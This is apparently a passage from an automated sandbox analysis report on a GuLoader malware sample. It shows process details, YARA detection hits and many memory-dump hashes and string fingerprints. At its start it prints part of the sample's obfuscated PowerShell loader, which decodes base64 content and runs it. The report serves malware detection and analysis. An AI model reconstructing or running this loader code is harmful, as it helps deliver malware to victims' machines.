temam.ydrepprcednBla,ei.oodrnBnne gLensbeFor.rn,isti+Sn,se+ ,pil%unref$Cha nCFiskehOxidia oolorBorgmmGenereQuaveuGudr s Abone.phanrSortbnnonsaeP stdsSk.lp. ForlcCaccio.iorduskokrnReakttKauti ') ;$Hustankes=$Charmeusernes[$outscold];}Udslyngende (Fremtidsmuligheders ' Sne.$Tidssgpr,sslUprooo Warsb ChryaBenzil.reak:Sku dFPlantoTeo orKont.e ,lats Biedt Unturrundpi Tys,e Ei,esBrede Ar.e=Paleo LabiGLumskeXylottPrste- InkbCI.teropraxinDipletLe.ite olomnDefintS,vog Timin$EnsnaSSkovseafholmvrdifiCarabhSkramyDkninp SankeH.perrDuplibFirmiohusetlAfte,i Lenac HymnaReslal duca1Soci.6Pensi3 rick ');Udslyngende (Fremtidsmuligheders 'Omin.$Enkelg MaxilSvieroskru,b Unema SupelU ern:Bat.eSCoolheSlebenDelphiNonquoNormarO erssKigsst JenhiA armp.nirte DiscnUnde,d Mi.tiBl,dea.akobtDe.issF ber Neel= elat Vmmel[ PostSOveriyP stesCh yetOsteaeDenebm ufte.OverpCDomm,oStamhnVelsovRefereAl,alrArtsmt Kond]Hoven:Comme:RecycFTriolrNonscoTheramEska.Bsk tta H ggs It leIn.om6 Xan,4OpdyrSSoldatPleb.rChantiklebinBesvagFo th(Meane$ForlgFSlabboactivrEneceeFor,isAm.ritEgoisrJulefi SlideNglevsTr ma)Br.ge ');Udslyngende (Fremtidsmuligheders 'inds.$,angsgMammal Lix,oEffuvbRumbaaSammelHvo.m: ,dstZ GastaAvestnStaaltLursaeJazz wIndkao.ycopoPinkid,evis dipl =Detai Kron[OdontSStrany frousCynodt Po.lekosmomRatsb.Tang TM.coleFolloxBe.latVaads.GarreESteamn AfstcS.smaoHemisdBivari ,vernPosttgCivil]Semiv:Sulf,:KalkbA FadeSVe,liC Lse,I KollI ref. 
DdsdGA tioeOver,tPaadmSHyatttM.norrC arai For,nFordeg ooth( bind$ HandS dsmye Shadn UturiLore,oSa.emrAkku.sHundrtTige ipoulapinduke FalbnAfsted ,entiRockfaGtepatBadgesSkude)Diape ');Udslyngende (Fremtidsmuligheders ' Pati$DetaigLyspalKo.kuoBoernbDisruaHattelcassy:SlageG TataeSemislUniveaCholotSighli,ndhfn oseiSi,elzRinediEquicnMe.iagPreun1.yvaa9Apoac2Proce=Bedrv$En.uiZBlomsaBigonnAftagtU,threJaevnwEnarboDe,onoPresedBozin.Derrys Ugesu SidebFiskes R.dit Tegar FamiiTsurinTll.rg Albu(Korne2burea9Vascu5Hensi9Tyskl8 Frit6Vaade,Heyru3 Pudd0 re.r4Dakot2Gautp8Go,mo)In,ei ');Udslyngende $Gelatinizing192;"
                                  Imagebase:0x770000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.4098203498.0000000005EC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.4120919409.0000000008AF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.4121086885.0000000009D38000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  Target ID:11
                                  Start time:18:16:06
                                  Start date:19/04/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4225696860.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 785e70ad2d17518a20756ffac2aa1c0aa12da1a5eceeccde65c4f985a9da6e44
                                    • Instruction ID: 77fa047fa53152f9792e73d6c00c5ca0c9ade7f9c6336878603cdde0961c0ab9
                                    • Opcode Fuzzy Hash: 785e70ad2d17518a20756ffac2aa1c0aa12da1a5eceeccde65c4f985a9da6e44
                                    • Instruction Fuzzy Hash: 9DB18E70E00229CFDF10CFA8DA957EDBBF1EF88354F148569D808A7254EB34A845DB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6dc605b564db65cf7295b0b68095bd12af469b19768785b1dd7185e6bea0719d
                                    • Instruction ID: 144490ae16f420e5f2850058d77ea402347dbbfe24ec3989c79c489f4ed8faf7
                                    • Opcode Fuzzy Hash: 6dc605b564db65cf7295b0b68095bd12af469b19768785b1dd7185e6bea0719d
                                    • Instruction Fuzzy Hash: 6F91A1B4B41204EFD714DB58CA44BAE7BA7AB84304F258464E510AF795CB72EC46CBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7aeaa869660210a016edcb8472dd6edea20f0f264a76fc60dde6ee55c5fa4cce
                                    • Instruction ID: 3acb5c0983daba1d3df04721afd21536c86dd01796a08329c26ecdbe319d965b
                                    • Opcode Fuzzy Hash: 7aeaa869660210a016edcb8472dd6edea20f0f264a76fc60dde6ee55c5fa4cce
                                    • Instruction Fuzzy Hash: 75911534A003149FCB15EF68D544AADBBF2FF89350F188AA9E4559B361CB35EC86CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fef21b2414aec5c40800616ac5c257314e2be1b492a7d42b686241a543cd96e9
                                    • Instruction ID: 1d786f86a1aace4023bcc6debb7b45403f4d14b1d2a373c88d42c3266e8174f6
                                    • Opcode Fuzzy Hash: fef21b2414aec5c40800616ac5c257314e2be1b492a7d42b686241a543cd96e9
                                    • Instruction Fuzzy Hash: AD91BFB4B01204EFDB14DB54CA44BA9BBB7AF88308F158469E514AF791CB72EC45CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae27b8835af3716bfc9205febc22a04ea3fc10d4b2cfe21475b846431724cb42
                                    • Instruction ID: 0b0f2e62f826dbfe2f4bdb98aba477e7e202aa29a40ff223d531ecbec8bc59f7
                                    • Opcode Fuzzy Hash: ae27b8835af3716bfc9205febc22a04ea3fc10d4b2cfe21475b846431724cb42
                                    • Instruction Fuzzy Hash: 6C813CB4A01205EFCB14CF58C595E9ABBF6FF88318F148469E804AB765C732EC45CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4844dfb75c671721a0e6c6a0d7d3a5b9c71742d16a360496835e075ec96ede5b
                                    • Instruction ID: 7e1508bf2766c782d8de85743bdd9b5b10d5ba1b7df22239ee01542827fa2e36
                                    • Opcode Fuzzy Hash: 4844dfb75c671721a0e6c6a0d7d3a5b9c71742d16a360496835e075ec96ede5b
                                    • Instruction Fuzzy Hash: 9D71CE70B002198FCB14DF68C984A9EBBF6FF89344F18856AD4199B651DB75EC46CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cf05e1a6c552098b078a9d6f68dcbe2fcd50fe744f9b55035ba83c67755b96b6
                                    • Instruction ID: 930b6e3da76128bcacf25cd5a83a8124d3621916fe0d32a5134c7c0bdff51239
                                    • Opcode Fuzzy Hash: cf05e1a6c552098b078a9d6f68dcbe2fcd50fe744f9b55035ba83c67755b96b6
                                    • Instruction Fuzzy Hash: A8715874B002199FDB14DFA4D584BADBBF2FF88344F148869D419AB7A0DB35AC46CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e6b7912062238adffa058610106e4500f7349457c2e52957c6a5f7c464515e6f
                                    • Instruction ID: ade3987d5bab403fe9fc98f67270a928454657e94ffafa97a30c16e7b2ded0f5
                                    • Opcode Fuzzy Hash: e6b7912062238adffa058610106e4500f7349457c2e52957c6a5f7c464515e6f
                                    • Instruction Fuzzy Hash: 87518E70B006199FDB24DFA9CA486AEBBF2FF84344F148969D019AB650DB74AC45CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1243db6fdc6e0cd5af101215b2bddd1b145fcad547c331a91cb3982386dbdba0
                                    • Instruction ID: b460aa066a3bba66dc122bd87cb487035a1411429c0ec6b964eb5cc901588208
                                    • Opcode Fuzzy Hash: 1243db6fdc6e0cd5af101215b2bddd1b145fcad547c331a91cb3982386dbdba0
                                    • Instruction Fuzzy Hash: 264171717046148FDB24DF68D658AAEBBF6FF89754F044468E40AEB7A0DB34AC41CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a31f3d3e6d9490807bb8abca51b4a9f107d7e39de0f6e2f4f8c23f9e56c35a39
                                    • Instruction ID: 7ad4579d36e6e6afab25481aa9a48ef6b3c015d7245fb2e205cd67da50e9fc0e
                                    • Opcode Fuzzy Hash: a31f3d3e6d9490807bb8abca51b4a9f107d7e39de0f6e2f4f8c23f9e56c35a39
                                    • Instruction Fuzzy Hash: FE31D374B40204AFD7149BA8C955FAF7AA3ABD4344F108824EA016F791CF769C468BD2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fe167f93ecee3ee27da2e6788a469cca2816a21b32f1d60f228ba0c1e080ca31
                                    • Instruction ID: 43ff26435d4762f095bc266a2640cb007aca0b9282b7d2474f4a6f1d97d0c1de
                                    • Opcode Fuzzy Hash: fe167f93ecee3ee27da2e6788a469cca2816a21b32f1d60f228ba0c1e080ca31
                                    • Instruction Fuzzy Hash: 95215EB4A042199FCB04CF98C5809AAFBF5FF89300B148495E819EB352C735FD41CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cdaf30b867a9fcf9319cedf2535dd6fc51a359605ddf51e3aaa5420ae72202ee
                                    • Instruction ID: 94e6f6e6d0217ac744edeb5de56cfa7ba4164972221aef64960b78ac6b48863a
                                    • Opcode Fuzzy Hash: cdaf30b867a9fcf9319cedf2535dd6fc51a359605ddf51e3aaa5420ae72202ee
                                    • Instruction Fuzzy Hash: 0C215E74A002599FCB00DFA8D9809AEBBF5FF89310B148595D809EB352C735FC45CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 54ce7fe05526cbda841879846ad3ee7b08137a63362c36ad751da01072df0496
                                    • Instruction ID: c6a4aecc3b966d90dbd60118c4413f5c80caca0920f87fb387a0633265ae15dc
                                    • Opcode Fuzzy Hash: 54ce7fe05526cbda841879846ad3ee7b08137a63362c36ad751da01072df0496
                                    • Instruction Fuzzy Hash: A40149A16093A09FC7029B6CDC601EABFB1EF82204B0941D7C898D7367C125DD4AC3A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4086727173.00000000031DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031DD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_31dd000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fef0a1e56d49fcee3ad4c20ea187d594dcb09a96271c8608dc81bdb65426deb6
                                    • Instruction ID: e4d23e0c6a73cdc07aa9be77b769cd8ed985c7830ccf90c49cb7c5521c72f660
                                    • Opcode Fuzzy Hash: fef0a1e56d49fcee3ad4c20ea187d594dcb09a96271c8608dc81bdb65426deb6
                                    • Instruction Fuzzy Hash: F801F231008300ABE710CA29FD84B67FF9CEF8A324F1CC56AEC080A246C779D885C6B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4086727173.00000000031DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031DD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_31dd000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6366a6992fbd31e61a9126d7686c9487f032ba7a823ebee35d253595fcd2fae4
                                    • Instruction ID: b9673610cd80e204f31de5d08712f98f13cf34645b441af4afd9493c6382c978
                                    • Opcode Fuzzy Hash: 6366a6992fbd31e61a9126d7686c9487f032ba7a823ebee35d253595fcd2fae4
                                    • Instruction Fuzzy Hash: 9701526240E3C09FD7128B259C94B52BFB8DF57224F1DC5DBD8888F193C2699845C772
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a8b9c5296f40fd45ad0b2695bc4d2f88b1ccecd48aafe79b8cc4a0b7e7bd282d
                                    • Instruction ID: 92fcf6b154176cb98be223628e8f56f575c7402c84d6abb252c1706f616901c5
                                    • Opcode Fuzzy Hash: a8b9c5296f40fd45ad0b2695bc4d2f88b1ccecd48aafe79b8cc4a0b7e7bd282d
                                    • Instruction Fuzzy Hash: FA01706274A6C07BD712A7B88091585FF70EF8332C75841CFD0460F2A3EA16C017DB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a2fc02980650c6a66ec1156b54ba7b947d5671e9e4b0e04cb9291246f9c591a7
                                    • Instruction ID: b05800fdb2bde7d00c1040f100857aa4be2e62940860fee1af0cc4e41ca97e88
                                    • Opcode Fuzzy Hash: a2fc02980650c6a66ec1156b54ba7b947d5671e9e4b0e04cb9291246f9c591a7
                                    • Instruction Fuzzy Hash: 1BF0BB31E00104EFCB14CF98D8845ADF7B5FF88320B248559D415A7650C736AC57CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 581ea74d6e21834cd800e2332614768ce5f019839e64cf4a9ad41e1267269118
                                    • Instruction ID: 36aa4053d5d8ee2a917ded4c22ae2c991066159069e1b04227bc48c959b28fe8
                                    • Opcode Fuzzy Hash: 581ea74d6e21834cd800e2332614768ce5f019839e64cf4a9ad41e1267269118
                                    • Instruction Fuzzy Hash: 97F0DA75A001159FCB15CF9CD990AEEF7B1FF88324F208199E515A72A1C736EC52CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                    • API String ID: 0-3512890053
                                    • Opcode ID: 047cfab6114f40cd1e108bf71f01ede7d40da54b1b3b14dc291234d6c3b1cd6e
                                    • Instruction ID: 987c120a2fba882077d3350858eab4b583d9d9d7ffcdbcedbd3813a3aaef42a4
                                    • Opcode Fuzzy Hash: 047cfab6114f40cd1e108bf71f01ede7d40da54b1b3b14dc291234d6c3b1cd6e
                                    • Instruction Fuzzy Hash: ECC159B1B0120AAFDB289B79890067ABBEAFFC5218F14887AD505CB350DF31D946C7D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                    • API String ID: 0-788909730
                                    • Opcode ID: 4d23d265619ce7943771c85ce6a4cee4042e2ff0f14cb146cb45c8e7f06c3066
                                    • Instruction ID: 81a92fa9237b38c5e7d01581da32f7d52ed90b550577e06ee0569756b4c94508
                                    • Opcode Fuzzy Hash: 4d23d265619ce7943771c85ce6a4cee4042e2ff0f14cb146cb45c8e7f06c3066
                                    • Instruction Fuzzy Hash: C6A169B1B8120DAFCB249A69C540AAABBF6AFC5324F14C86AD4058F345DF32DC46C7D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                    • API String ID: 0-1823345594
                                    • Opcode ID: 2939efc1d3221799ef62cc1e73f40938afc163f3ea8db93925ef5e77a8b58023
                                    • Instruction ID: b54c6e009c9d77ce3c1ef214ee384f958422ef94baa2edb119c78f187ba717a5
                                    • Opcode Fuzzy Hash: 2939efc1d3221799ef62cc1e73f40938afc163f3ea8db93925ef5e77a8b58023
                                    • Instruction Fuzzy Hash: B0E14AB0B05206EFCB289F68D5046AABBF6AF85318F14C8AAD415CFB59DB31C845C7D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                    • API String ID: 0-1608119003
                                    • Opcode ID: 282f145248a6c7bb63f43486c105c91909f87ca0834998eff7c12af44efbe4e1
                                    • Instruction ID: 78fa3c6a5b438e6911e81eea6cac2fc8b2be1828a22e9942a1fabeef057e50e3
                                    • Opcode Fuzzy Hash: 282f145248a6c7bb63f43486c105c91909f87ca0834998eff7c12af44efbe4e1
                                    • Instruction Fuzzy Hash: B9F15AB2B01216AFCB249B68D5006AABBF7EFC5314F14887AD419CB351DB32D84AC7D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                    • API String ID: 0-3199432138
                                    • Opcode ID: e5c81dfac060fa9ff6d4a186bc7eca6e6af49e92328b6deee434d30b741a5ae8
                                    • Instruction ID: 856be8f0e90dbb0691ea3a06b03815e74294e6bb698cc4724993267f87f50ade
                                    • Opcode Fuzzy Hash: e5c81dfac060fa9ff6d4a186bc7eca6e6af49e92328b6deee434d30b741a5ae8
                                    • Instruction Fuzzy Hash: 309169B1B05316EFCB254F2889007AA7BE9BFC5229F14886AD801CB391DF31E845C7E1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                    • API String ID: 0-2822668367
                                    • Opcode ID: 8bac485dc0de380b645069f752a85a4f9ecff7629d2bf4a5b7bd6fe468592c72
                                    • Instruction ID: 3f4a7edba9efdca8d95c63462de1522b8a41e39286281f37651bcc1ce91fad6d
                                    • Opcode Fuzzy Hash: 8bac485dc0de380b645069f752a85a4f9ecff7629d2bf4a5b7bd6fe468592c72
                                    • Instruction Fuzzy Hash: DCD125B4A01218DFDB24DB24C950BDEBBB2BB89304F1089E5D5086B755CB71AEC6CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XRcq$XRcq$XRcq$tP^q$tP^q$$^q
                                    • API String ID: 0-1682816917
                                    • Opcode ID: adc5f5c01cd3a13a81683a7fe1fee262b8eab48a77551f31eedca85f6905638a
                                    • Instruction ID: 11de69ba56ea76cea8b214deee145f90bc0d23dd5e74ec1131b578d7b914cbf7
                                    • Opcode Fuzzy Hash: adc5f5c01cd3a13a81683a7fe1fee262b8eab48a77551f31eedca85f6905638a
                                    • Instruction Fuzzy Hash: 766127B5B41205AFCB249F6885406AEBBF6EF89314F24C869E8019F355CB31DC45CBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                    • API String ID: 0-3997570045
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$$^q$$^q$$^q$$^q
                                    • API String ID: 0-2825857601
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: tP^q$$^q$$^q$$^q$$^q
                                    • API String ID: 0-324510305
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (o^q$(o^q$(o^q$(o^q
                                    • API String ID: 0-1978863864
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q$4'^q
                                    • API String ID: 0-1420252700
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: tP^q$tP^q$tP^q$tP^q
                                    • API String ID: 0-91886675
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
